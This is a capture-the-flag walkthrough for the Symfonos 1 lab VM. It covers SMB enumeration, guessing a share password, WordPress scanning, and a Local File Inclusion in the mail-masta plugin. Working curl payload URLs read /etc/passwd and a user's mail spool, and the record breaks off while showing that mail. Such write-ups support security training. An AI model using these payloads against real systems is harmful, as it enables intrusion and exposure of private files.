Symfonos 1

Symfonos 1 Vulnhub Walkthrough

Enumeration

nmap

nmap -sC -sV -oA nmap/sym1 192.168.1.112
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 06:26 EDT
Nmap scan report for 192.168.1.112
Host is up (0.00017s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:04:0F:D1 (VMware)
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 1s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos
|   NetBIOS computer name: SYMFONOS\x00
|   Domain name: \x00
|   FQDN: symfonos
|_  System time: 2020-05-15T05:27:13-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-15T10:27:13
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.31 seconds

Browsing to http://192.168.1.112 shows only a plain page with nothing useful on it (the page is a screenshot in the original post), and dirb does not turn up anything interesting either. Since SMB is open and a guest session was accepted during the nmap scan, let's use enum4linux to see what a null session gives us.

enum4linux

enum4linux -a 192.168.1.112
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 15 06:47:58 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.1.112
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 192.168.1.112    |
 ===================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================= 
|    Nbtstat Information for 192.168.1.112    |
 ============================================= 
Looking up status of 192.168.1.112
        SYMFONOS        <00> -         B <ACTIVE>  Workstation Service
        SYMFONOS        <03> -         B <ACTIVE>  Messenger Service
        SYMFONOS        <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ====================================== 
|    Session Check on 192.168.1.112    |
 ====================================== 
[+] Server 192.168.1.112 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 192.168.1.112    |
 ============================================ 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================= 
|    OS information on 192.168.1.112    |
 ======================================= 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.1.112 from smbclient: 
[+] Got OS info for 192.168.1.112 from srvinfo:
        SYMFONOS       Wk Sv PrQ Unx NT SNT Samba 4.5.16-Debian
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

 ============================== 
|    Users on 192.168.1.112    |
 ============================== 
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: helios   Name:   Desc: 

user:[helios] rid:[0x3e8]

 ========================================== 
|    Share Enumeration on 192.168.1.112    |
 ========================================== 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        helios          Disk      Helios personal share
        anonymous       Disk      
        IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            SYMFONOS

[+] Attempting to map shares on 192.168.1.112
//192.168.1.112/print$  Mapping: DENIED, Listing: N/A
//192.168.1.112/helios  Mapping: DENIED, Listing: N/A
//192.168.1.112/anonymous       Mapping: OK, Listing: OK
//192.168.1.112/IPC$    [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ===================================================== 
|    Password Policy Information for 192.168.1.112    |
 ===================================================== 
[E] Unexpected error from polenum:


[+] Attaching to 192.168.1.112 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Missing required parameter 'digestmod'.

[+] Trying protocol 445/SMB...

        [!] Protocol failed: Missing required parameter 'digestmod'.


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 =============================== 
|    Groups on 192.168.1.112    |
 =============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================== 
|    Users on 192.168.1.112 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-3173842667-3005291855-38846888
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-21-3173842667-3005291855-38846888 and logon username '', password ''
S-1-5-21-3173842667-3005291855-38846888-500 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-501 SYMFONOS\nobody (Local User)
S-1-5-21-3173842667-3005291855-38846888-502 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-503 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-504 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-505 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-506 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-507 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-508 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-509 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-510 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-511 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-512 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-513 SYMFONOS\None (Domain Group)
S-1-5-21-3173842667-3005291855-38846888-514 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-515 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-516 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-517 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-518 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-519 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-520 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-521 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-522 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-523 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-524 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-525 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-526 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-527 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-528 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-529 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-530 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-531 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-532 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-533 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-534 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-535 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-536 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-537 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-538 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-539 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-540 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-541 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-542 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-543 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-544 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-545 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-546 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-547 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-548 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-549 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-550 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1000 SYMFONOS\helios (Local User)
S-1-5-21-3173842667-3005291855-38846888-1001 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1002 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1003 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1004 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1005 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1006 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1007 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1008 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1009 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1010 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1011 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1012 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1013 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1014 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1015 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1016 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1017 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1018 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1019 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1020 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1021 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1022 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1023 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1024 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1025 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1026 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1027 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1028 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1029 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1030 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1031 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1032 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1033 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1034 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1035 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1036 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1037 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1038 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1039 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1040 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1041 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1042 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1043 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1044 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1045 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1046 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1047 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1048 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1049 *unknown*\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\helios (Local User)

 ============================================== 
|    Getting printer info for 192.168.1.112    |
 ============================================== 
No printers returned.


enum4linux complete on Fri May 15 06:48:15 2020

As we can see, there are two non-default shares, helios and anonymous. The anonymous share maps with a null session (Mapping: OK) while helios is denied, and RID cycling gives us exactly one local user, helios. Both shares are worth a closer look.
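As an added example (not from the original post), here is a small parser that pulls the actionable facts out of an enum4linux run: whether a null session is accepted, which shares it can map, and which RIDs resolved to real accounts rather than *unknown*. The sample text is a constructed excerpt of the output above; the regexes assume the enum4linux v0.8.x line format shown there.

```python
# Added example: triage enum4linux output (null session, mappable shares, resolved RIDs).
import re

# Constructed excerpt of the enum4linux run shown above.
SAMPLE = """\
[+] Server 192.168.1.112 allows sessions using username '', password ''
[+] Attempting to map shares on 192.168.1.112
//192.168.1.112/print$  Mapping: DENIED, Listing: N/A
//192.168.1.112/helios  Mapping: DENIED, Listing: N/A
//192.168.1.112/anonymous       Mapping: OK, Listing: OK
//192.168.1.112/IPC$    [E] Can't understand response:
S-1-5-32-544 BUILTIN\\Administrators (Local Group)
S-1-5-32-545 BUILTIN\\Users (Local Group)
S-1-5-21-3173842667-3005291855-38846888-500 *unknown*\\*unknown* (8)
S-1-5-21-3173842667-3005291855-38846888-501 SYMFONOS\\nobody (Local User)
S-1-5-21-3173842667-3005291855-38846888-1000 SYMFONOS\\helios (Local User)
S-1-22-1-1000 Unix User\\helios (Local User)
"""

# //host/share  Mapping: OK|DENIED, Listing: OK|N/A
SHARE_RE = re.compile(
    r"^//(?P<host>[^/]+)/(?P<share>\S+)\s+Mapping:\s*(?P<map>\w+),\s*Listing:\s*(?P<list>\S+)",
    re.M,
)
# S-1-...-<rid> DOMAIN\name (kind)   (the SID part backtracks so the last number is the RID)
SID_RE = re.compile(
    r"^(?P<sid>S-1-[\d-]+)-(?P<rid>\d+)\s+(?P<domain>[^\\]+)\\(?P<name>.+?)\s+\((?P<kind>[^)]+)\)\s*$",
    re.M,
)


def null_session_allowed(text):
    """True if enum4linux reported an anonymous (''/'') session."""
    return re.search(r"allows sessions using username '', password ''", text) is not None


def mappable_shares(text):
    """Shares the null session could map, i.e. the ones to open with smbclient -N."""
    return [m["share"] for m in SHARE_RE.finditer(text) if m["map"] == "OK"]


def resolved_accounts(text):
    """(rid, name, kind) for every RID that resolved, skipping *unknown* and BUILTIN groups."""
    out = []
    for m in SID_RE.finditer(text):
        if m["name"] == "*unknown*" or m["domain"] == "BUILTIN":
            continue
        out.append((int(m["rid"]), m["name"], m["kind"]))
    return out


def local_users(text):
    """Sorted, de-duplicated local user names (the same account shows up under two SIDs)."""
    return sorted({name for _, name, kind in resolved_accounts(text) if kind == "Local User"})


if __name__ == "__main__":
    print("null session:", null_session_allowed(SAMPLE))
    print("mappable shares:", mappable_shares(SAMPLE))
    print("local users:", local_users(SAMPLE))
```

Running it on a full enum4linux log instead of SAMPLE gives the same three answers for a real target; the *unknown* filter is what keeps the RID-cycling noise out of the user list.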

smbclient

We can connect to the anonymous share without a password (press Enter at the password prompt, or pass -N for a null session):

smbclient -N //192.168.1.112/anonymous

Then ls lists the contents of the share, get attention.txt downloads the file, and cat attention.txt on our machine shows the text inside.

The note (shown as a screenshot in the original post) contains what might be the password for the helios share. So, in the terminal, type

smbclient //192.168.1.112/helios -U helios

and the password qwerty works.

List the files again with ls and there are two text files, research.txt and todo.txt. Download both with get and open them (their contents are screenshots in the original post).

todo.txt ends with a reference to /h3l105, so try that path in the browser: http://192.168.1.112/h3l105

The site does not render properly because its links point at the hostname symfonos.local rather than the IP, so add a line for it to /etc/hosts:

192.168.1.112 symfonos.local

Reload the page and it renders.

The site is powered by WordPress, so we use wpscan to enumerate the installation and look for vulnerable components.

wpscan

Run this in the terminal:

wpscan --url http://symfonos.local/h3l105 --enumerate p

Use the symfonos.local hostname we added to /etc/hosts rather than the IP; WordPress generates its links with the hostname, and scanning by IP can make wpscan miss things.

The p in --enumerate p means popular plugins (vp would be vulnerable plugins only, ap all known plugins).

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://symfonos.local/h3l105/ [192.168.1.112]
[+] Started: Fri May 15 07:17:13 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://symfonos.local/h3l105/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://symfonos.local/h3l105/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://symfonos.local/h3l105/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://symfonos.local/h3l105/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://symfonos.local/h3l105/index.php/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
 |  - http://symfonos.local/h3l105/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 1.5
 | Style URL: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/style.css?ver=1.4
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://symfonos.local/h3l105/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt

[+] site-editor
 | Location: http://symfonos.local/h3l105/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.1.1 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/site-editor/readme.txt

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Fri May 15 07:17:16 2020
[+] Requests Done: 33
[+] Cached Requests: 5
[+] Data Sent: 8.48 KB
[+] Data Received: 484.737 KB
[+] Memory used: 177.504 MB
[+] Elapsed time: 00:00:03

Exploit

After some searching, it turns out the mail-masta plugin (version 1.0) is vulnerable to Local File Inclusion (LFI): its count_of_send.php script includes whatever file path is passed in the pl parameter. The advisory with a proof-of-concept is on exploit-db. This is not Remote Code Execution by itself, but as we will see it can be turned into it.

Replace the target in the proof-of-concept URL with ours; the proof-of-concept reads /etc/passwd:

curl -s "http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"

From the output we learn there is a user called helios.

Postfix delivers local mail to mbox spools at /var/mail/<username> by default, so the same LFI can read helios' mailbox:

curl

curl -s http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios
From root@symfonos.localdomain  Fri Jun 28 21:08:55 2019
Return-Path: <root@symfonos.localdomain>
X-Original-To: root
Delivered-To: root@symfonos.localdomain
Received: by symfonos.localdomain (Postfix, from userid 0)
        id 3DABA40B64; Fri, 28 Jun 2019 21:08:54 -0500 (CDT)
From: root@symfonos.localdomain (Cron Daemon)
To: root@symfonos.localdomain
Subject: Cron <root@symfonos> dhclient -nw
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
Message-Id: <20190629020855.3DABA40B64@symfonos.localdomain>
Date: Fri, 28 Jun 2019 21:08:54 -0500 (CDT)

